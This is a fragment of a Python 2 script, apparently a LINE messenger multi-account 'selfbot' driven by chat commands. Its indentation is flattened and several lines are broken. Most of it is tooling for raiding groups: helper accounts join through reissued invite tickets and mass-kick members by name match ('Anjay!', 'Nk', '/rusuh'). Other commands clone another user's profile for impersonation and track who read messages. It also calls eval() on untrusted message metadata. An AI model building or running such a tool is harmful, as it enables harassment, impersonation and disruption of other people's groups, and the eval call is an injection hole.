ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["R2 curl","R2 link off"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done ")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"➰ NAME GROUP ➰\n" + str(ginfo.name) + "\n\n🔹 Group Id \n" + msg.to + "\n\n🔹Creator \n" + gCreator + "\n\n🔹Status profile \nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\n~ Members :: " + str(len(ginfo.members)) + " Members\n~ Pending :: " + sinvitee + " People\n~ URL :: " + u + "it is inside")
else:
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Gc" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"old user")
elif "Id" == msg.text:
cl.sendText(msg.to,msg.to)
elif "All mid" == msg.text:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
kb.sendText(msg.to,Dmid)
kd.sendText(msg.to,Emid)
ke.sendText(msg.to,Fmid)
kf.sendText(msg.to,Imid)
kg.sendText(msg.to,Gmid)
kh.sendText(msg.to,Hmid)
kj.sendText(msg.to,Jmid)
elif "Mid" == msg.text:
cl.sendText(msg.to,mid)
elif "R1 mid" == msg.text:
ki.sendText(msg.to,Amid)
elif "R2 mid" == msg.text:
kk.sendText(msg.to,Bmid)
elif "TL: " in msg.text:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Protect:on","Protect on"]:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Protection Enable On")
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Enable On")
else:
cl.sendText(msg.to,"already on")
elif msg.text in ["Protect qr off"]:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Protection QR Off")
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR Off")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Protect qr on"]:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Protection QR On")
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:off","Protect off"]:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Protection Disable Off")
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Disable Off")
else:
cl.sendText(msg.to,"Already off")
elif ("Cn: " in msg.text):
if msg.toType == 2:
profile = cl.getProfile()
X = msg.text.replace("Cn: ","")
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to,"Name ~ " + X + " Done")
else:
cl.sendText(msg.to,"Failed")
elif ("1Cn " in msg.text):
if msg.toType == 2:
profile = ki.getProfile()
X = msg.text.replace("1Cn ","")
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to,"name " + X + " done")
else:
ki.sendText(msg.to,"Failed")
elif ("2Cn " in msg.text):
if msg.toType == 2:
profile = kk.getProfile()
X = msg.text.replace("2Cn ","")
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to,"name " + X + " done")
else:
kk.sendText(msg.to,"Failed")
elif ("3Cn " in msg.text):
if msg.toType == 2:
profile = kk.getProfile()
X = msg.text.replace("3Cn ","")
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to,"name " + X + " done")
else:
kk.sendText(msg.to,"Failed")
elif msg.text in ["Mc: "]:
mmid = msg.text.replace("Mc: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["連絡先:オン","K on","Contact on","顯示:開"]:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡先:オフ","K off","Contact off","顯示:關"]:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オン","Join on","Auto join:on","自動åƒåŠ ï¼šé–‹"]:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オフ","Join off","Auto join:off","自動åƒåŠ ï¼šé—œ"]:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif ("Auto cancel: " in msg.text):
try:
strnum = msg.text.replace("Auto cancel: ","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自動退出:關"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share:on","Share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["共有:オフ","Share:off","Share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["Set"]:
md = " ➰「 SETTING 」➰\n ===[™D®∆G0¶™вσт]===\n\n"
if wait["contact"] == True: md+="🔹 Contact → on\n"
else: md+="🔹 Contact → off\n"
if wait["autoJoin"] == True: md+="🔹 Auto join → on\n"
else: md +="🔹 Auto join → off\n"
if wait["autoCancel"]["on"] == True: md+="🔹 Auto cancel → "+ str(wait["autoCancel"]["members"]) + "\n"
else: md+= "🔹 Auto cancel → off\n"
if wait["likeOn"] == True: md+="🔹 Auto Like → on\n"
else: md+="🔹 Auto Like → off\n"
if wait["leaveRoom"] == True: md+="🔹 Auto leave → on\n"
else: md+="🔹 Auto leave → off\n"
if wait["timeline"] == True: md+="🔹 Share → on\n"
else: md+="🔹 Share → off\n"
if wait["autoAdd"] == True: md+="🔹 Auto add → on\n"
else: md+="🔹 Auto add → off\n"
if wait["commentOn"] == True: md+="🔹 Comment → on\n"
else: md+="🔹 Comment → off\n"
if wait["Backup"] == True: md+="🔹 Auto Backup → on\n"
else: md+="🔹 Auto Backup → off\n"
if wait["qr"] == True: md+="🔹 Protect QR : on\n"
else: md+="🔹 Protect QR → off\n"
if wait["protectionOn"] == True: md+="🔹 Protection → on\n"
else: md+="🔹 Protection → off\n"
if wait["welcome"] == True: md+="🔹 Welcome → on\n"
else: md+="🔹 Welcome → off\n"
cl.sendText(msg.to,md + "\n ➰┅═ই❂͡★Amii™┅═ই❂͡✔✔")
elif msg.text in ["Group id","List group"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[🔹] %s \n" % (cl.getGroup(i).name + " :::: " + str(len (cl.getGroup(i).members)))
cl.sendText(msg.to, "==== [MY GROUPS] ====\n\n"+ h +"\n TOTAL GROUPS : " +str(len(gid)))
elif msg.text in ["Cancelall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif msg.text in ["Cancelall1"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"All invitations have been refused")
else:
ki.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif msg.text in ["Cancelall2"]:
gid = kk.getGroupIdsInvited()
for i in gid:
kk.rejectGroupInvitation(i)
if wait["lang"] == "JP":
kk.sendText(msg.to,"All invitations have been refused")
else:
kk.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif msg.text in ["Backup on","backup:on"]:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Backup On")
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup On")
else:
cl.sendText(msg.to,"already on")
elif msg.text in ["Backup off","backup:off"]:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Backup Off")
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup Off")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Auto like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
elif msg.text in ["Auto like off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif "My message" in msg.text:
cl.sendText(msg.to,"Your message ⤵\n\n" + str(wait["message"]))
elif "Message set: " in msg.text:
m = msg.text.replace("Message set: ","")
if m in [""," ","\n",None]:
cl.sendText(msg.to,"Error")
else:
wait["message"] = m
cl.sendText(msg.to,"Changed ⤵\n\n" + m)
elif "Comment set: " in msg.text:
c = msg.text.replace("Comment set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Error")
else:
wait["comment"] = c
cl.sendText(msg.to,"Changed ⤵\n\n" + c)
elif msg.text in ["Comment on","Comment:on","自動首é 留言:開"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["コメント:オフ","Comment:off","Comment off","自動首é 留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["Welcome on"]:
if wait["welcome"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
wait["welcome"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome off"]:
if wait["welcome"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["welcome"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
elif msg.text in ["My comment","留言確èª"]:
cl.sendText(msg.to,"Your comment ⤵\n\n" + str(wait["comment"]))
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u78e5efff85bf97393cc2c4b8ecf93d25'}
cl.sendMessage(msg)
cl.sendText(msg.to, "My creator ⤴")
random.choice(KIL).sendText(msg.to, "My creator ⤴")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["2gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "[]" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif msg.text in ["Change clock "]:
n = msg.text.replace("Change clock ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,".")
else:
cl.sendText(msg.to,"Please turn on the name clock.")
#-----------------------------------------------
elif msg.text == "Cctv":
cl.sendText(msg.to, "Check in a readPoint")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Cilubba":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "People who readed %s\nthat's it\n\nPeople who have ignored reads\n%sIt is abnormal ♪\n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "An already read point has not been set.\n「Cctv」you can send ♪ read point will be created ♪")
#-----------------------------------------------
elif "Maaf! " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Maaf! ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
kc.kickoutFromGroup(msg.to,[target])
kc.leaveGroup(msg.to)
cl.updateGroup(G)
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Succes ")
kk.sendText(msg.to,"Bye")
elif "Sorry!! " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Sorry!! ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
kk.kickoutFromGroup(msg.to,[target])
kk.leaveGroup(msg.to)
cl.updateGroup(G)
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Succes ")
kk.sendText(msg.to,"Bye")
#-----------------------------------------------
elif msg.text in ["Masuk beb"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kd.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
ke.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kf.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kg.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kh.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kj.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
kk.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
kk.updateGroup(G)
elif msg.text in ["Kuy1"]:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = kk.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = kk.reissueGroupTicket(msg.to)
elif msg.text in ["Kuy2"]:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(msg.to)
elif msg.text in ["Kuy3"]:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(msg.to)
#-----------------------------------------------
#.acceptGroupInvitationByTicket(msg.to,Ticket)
#-----------------------------------------------
elif msg.text in ["Husss"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
kb.leaveGroup(msg.to)
kd.leaveGroup(msg.to)
ke.leaveGroup(msg.to)
kf.leaveGroup(msg.to)
kg.leaveGroup(msg.to)
kh.leaveGroup(msg.to)
kj.leaveGroup(msg.to)
except:
pass
elif msg.text in ["@left"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Lc @bye"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Hy @bye"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
#------------------------[Copy]-------------------------
elif msg.text in ["Backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to,"Backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
elif "Copy @" in msg.text:
if msg.toType == 2:
print "[Copy]"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Succes")
except Exception as e:
print e
#-----------------------------------------------
elif msg.text in ["Fuck"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"Bye")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "Anjay!" in msg.text:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Anjay!","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
ki.sendText(msg.to,"Just some casual cleansing ")
kk.sendText(msg.to,"Group cleansed.")
kk.sendText(msg.to,"Bye All")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found.")
kk.sendText(msg.to,"Not found.")
else:
for target in targets:
if not target in Bots:
try:
klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg,to,"Group cleanse")
kk.sendText(msg,to,"Group cleanse")
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Succes ")
kk.sendText(msg.to,"Bye")
elif "BL @" in msg.text:
_name = msg.text.replace("BL @","")
_kicktarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes ")
except:
cl.sendText(msg.to,"error")
elif "Ban " in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ban0 = msg.text.replace("Ban ","")
ban1 = ban0.lstrip()
ban2 = ban1.replace("@","")
ban3 = ban2.rstrip()
_name = ban3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"ヽ( ^ω^)ノ Success")
except:
cl.sendText(msg.to,"ヽ( ^ω^)ノ Success")
elif "Mentions" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//300
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
elif "Unban " in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
unb0 = msg.text.replace("Unban ","")
unb1 = unb0.lstrip()
unb2 = unb1.replace("@","")
unb3 = unb2.rstrip()
x_name = unb3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if x_name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"ヽ( ^ω^)ノ Success")
except:
cl.sendText(msg.to,"ヽ( ^ω^)ノ Success")
elif "Namelock on" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"Turned on")
else:
cl.sendText(msg.to,"Already on")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock off" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"Turn off")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"Already off")
elif "Mid " in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Your mid ⤵\n" + contact.mid)
except:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + str(cu))
elif "/rusuh " in msg.text:
if msg.contentMetadata is not None:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
ki.kickoutFromGroup(msg.to,[target])
else:
pass
#-----------------------------------------------
elif msg.text in ["Tes"]:
